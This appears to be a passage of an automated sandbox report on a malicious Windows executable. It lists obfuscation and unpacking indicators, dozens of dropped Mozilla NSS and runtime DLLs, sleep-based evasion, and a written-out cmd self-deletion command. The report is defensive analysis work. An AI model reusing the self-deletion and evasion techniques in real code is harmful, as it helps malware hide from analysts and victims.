Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.1.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.1.dr
Source: Binary string: C:\zihiwimugugi93\ragos 20\kusawuv\15.pdb source: KqxsoH2Rhn.exe
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.1.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.1.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: KqxsoH2Rhn.exe, 00000001.00000002.379023402.000000006FB09000.00000002.00020000.sdmp, mozglue.dll.1.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.1.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.1.dr
Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy_InUse.dll.1.dr
Source: Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.1.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.1.dr
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.1.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.1.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: KqxsoH2Rhn.exe, 00000001.00000002.379023402.000000006FB09000.00000002.00020000.sdmp, mozglue.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.1.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.1.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.1.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.1.dr
Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.1.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.1.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.1.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.1.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.1.dr
Source: Binary string: aC:\zihiwimugugi93\ragos 20\kusawuv\15.pdb source: KqxsoH2Rhn.exe
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.1.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.1.dr

Data Obfuscation:

barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Unpacked PE file: 1.2.KqxsoH2Rhn.exe.400000.0.unpack
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Unpacked PE file: 1.2.KqxsoH2Rhn.exe.400000.0.unpack .text:ER;.data:W;.web:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_00466770 push eax; ret 1_2_0046678E
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_004667E0 push eax; ret 1_2_004667C5
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0046678F push eax; ret 1_2_004667C5
PE file contains sections with non-standard names
Source: KqxsoH2Rhn.exe Static PE information: section name: .web
Source: sqlite3.dll.1.dr Static PE information: section name: /4
Source: sqlite3.dll.1.dr Static PE information: section name: /19
Source: sqlite3.dll.1.dr Static PE information: section name: /31
Source: sqlite3.dll.1.dr Static PE information: section name: /45
Source: sqlite3.dll.1.dr Static PE information: section name: /57
Source: sqlite3.dll.1.dr Static PE information: section name: /70
Source: sqlite3.dll.1.dr Static PE information: section name: /81
Source: sqlite3.dll.1.dr Static PE information: section name: /92
Source: AccessibleHandler.dll.1.dr Static PE information: section name: .orpc
Source: AccessibleMarshal.dll.1.dr Static PE information: section name: .orpc
Source: IA2Marshal.dll.1.dr Static PE information: section name: .orpc
Source: lgpllibs.dll.1.dr Static PE information: section name: .rodata
Source: MapiProxy.dll.1.dr Static PE information: section name: .orpc
Source: MapiProxy_InUse.dll.1.dr Static PE information: section name: .orpc
Source: mozglue.dll.1.dr Static PE information: section name: .didat
Source: msvcp140.dll.1.dr Static PE information: section name: .didat
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_004333DD LoadLibraryA,GetProcAddress,FreeLibrary, 1_2_004333DD
Binary contains a suspicious time stamp
Source: ucrtbase.dll.1.dr Static PE information: 0x9E3394C7 [Sun Feb 8 16:22:31 2054 UTC]
Source: initial sample Static PE information: section name: .text entropy: 7.74205706051

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\mozMapi32_InUse.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\MapiProxy_InUse.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\nssckbi.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-multibyte-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\AccessibleHandler.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-private-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\breakpadinjector.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\mozMapi32.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\prldap60.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\IA2Marshal.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\ucrtbase.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\lgpllibs.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\ldap60.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\libEGL.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\AccessibleMarshal.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\MapiProxy.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\nssdbm3.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\ldif60.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\qipcap.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Self deletion via cmd delete
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Process created: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\KqxsoH2Rhn.exe"
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Process created: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\KqxsoH2Rhn.exe" Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0041DD0B __EH_prolog,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_0041DD0B

Malware Analysis System Evasion:

barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe TID: 7136 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 7000 Thread sleep count: 84 > 30 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\mozMapi32_InUse.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\MapiProxy_InUse.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\nssckbi.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-multibyte-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\AccessibleHandler.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-private-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\breakpadinjector.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\mozMapi32.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\prldap60.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\IA2Marshal.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\lgpllibs.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\ldap60.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\libEGL.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\AccessibleMarshal.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\MapiProxy.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\nssdbm3.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
